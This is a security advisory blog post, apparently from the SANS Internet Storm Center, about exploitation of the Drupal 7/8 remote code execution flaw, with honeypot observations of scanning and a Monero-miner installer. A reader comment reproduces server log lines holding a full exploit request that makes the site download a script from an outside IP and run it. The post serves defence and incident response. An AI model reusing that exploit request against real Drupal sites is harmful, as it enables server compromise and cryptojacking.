[Update: Now used to install Monero Miners. See below for details] Drupal announced a Remote Code Execution vulnerability affecting Drupal 7.x and 8.x on March 28 (https://www.drupal.org/sa-core-2018-002) Proof of concpet code appeared on github on April 12th. Quick testing on handler's honeypots indicate that it functions as advertised. Upgrade to 7.58 or 8.5.1 Scans/attemps are showing up in other Handlers' honeypots:
And here is a second exploit attempt, trying to identify vulnerable servers:
The payload pings a host where the hostname of the target is prefixed to the hostname to be pinged. This is sort of interesting as mu6fea.ceye.io is a wildcard DNS entry, and *.mu6fea.ceye.io appears to resolve to 118.192.48.48 right now. So the detection of who is "pinging" is made most likely via DNS. The authoritative name server for "ceye.io" is ns[12].hackernews.cc, which appears to belong to a Chinese security news site. Maybe they are working on a story to publish how many vulnerable systems there are, but actual exploitation of a vulnerability, even if somewhat benign, may be a step too far for a news story. Other payloads spotted so far: echo `whoami` Here is one installing the standard xmrig Monero miner. The exploit string (spaces added to allow for wrapping on small screens):
This decodes to: (http replaced with hxxp)
"i" is an installer script. It collects information about the system and makes itself persistent via an entry in the crontab:
It also download additional files:
the miner will then connect to port 6666 on u5evn7.if1j0ytgkypa.tk , which currently resolves to 207.246.113.230 and 144.202.37.130. |
Kevin Liston 292 Posts ISC Handler Apr 13th 2018 |
Thread locked Subscribe |
Apr 13th 2018 2 years ago |
Our site has updated to drupal 7.59 and the problem still exists.
Centos 7.3 / sw-nginx-1.11.1-centos7.17071211.x86_64 Suggestions ? Can you tell me which /tmp file it is using for the download ? They are using Python to submit the POST. I have tried to simulate the post by doesnt' work, any suggestions ? Any assistance would be appreciated. Below is just one example, have quite a few if needed. The logs indicate only a POST is being issued. OUR.com/logs/access_log:155.94.75.92 - - [20/Jun/2018:04:48:56 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23markup]=wget%20-O%20/tmp/a.sh%20http://155.94.75.92/a.sh;%20sh%20/tmp/a.sh&name[%23type]=markup HTTP/1.0" 200 26615 "-" "Python-urllib/2.7" OUR.com/logs/access_log:155.94.75.92 - - [20/Jun/2018:04:48:56 -0400] "POST /?q=user/password&name[#post_render][]=passthru&name[#markup]=wget -O /tmp/a.sh http://155.94.75.92/a.sh; sh /tmp/a.sh&name[#type]=markup HTTP/1.0" 200 26615 "-" "Python-urllib/2.7" |
Anonymous |
Quote |
Jun 20th 2018 2 years ago |
Sign Up for Free or Log In to start participating in the conversation!